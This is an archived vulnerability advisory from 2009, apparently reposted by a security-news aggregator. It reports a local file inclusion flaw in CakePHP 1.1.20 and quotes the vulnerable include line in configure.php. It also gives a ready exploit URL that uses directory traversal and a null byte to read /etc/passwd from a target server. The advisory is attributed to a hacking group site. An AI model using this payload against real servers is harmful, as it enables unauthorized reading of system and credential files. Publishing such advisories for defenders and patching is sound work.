Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22124
HistoryJul 06, 2009 - 12:00 a.m.

CakePHP 1.1.20 Local File Inclusion Vulnerability

2009-07-0600:00:00
vulners.com
50

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+ CakePHP 1.1.20 Local File Inclusion Vulnerability
+
+ Discovered by Cru3l.b0y
+
+ WwW.DeltaHacking.Net
+
+
+

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

###################################################################################################
AUTHOR : Cru3l.b0y
APPLICATION : CakePHP
VERSION : 1.1.20
DOWNLOAD :
http://cakeforge.org/frs/download.php/677/cake_1.1.20.7692.tar.gz/donation=complete
VENDOR : http://cakeforge.org/
###################################################################################################

Vulnerable Code :
###################################################################################################
/cake/libs/configure.php

215 include(CONFIGS . $fileName . '.php');

[+]Exploit:
http://[t4rg3t]/[p4th]/cake/libs/configure.php?fileName=…/…/…/etc/passwd%00
###################################################################################################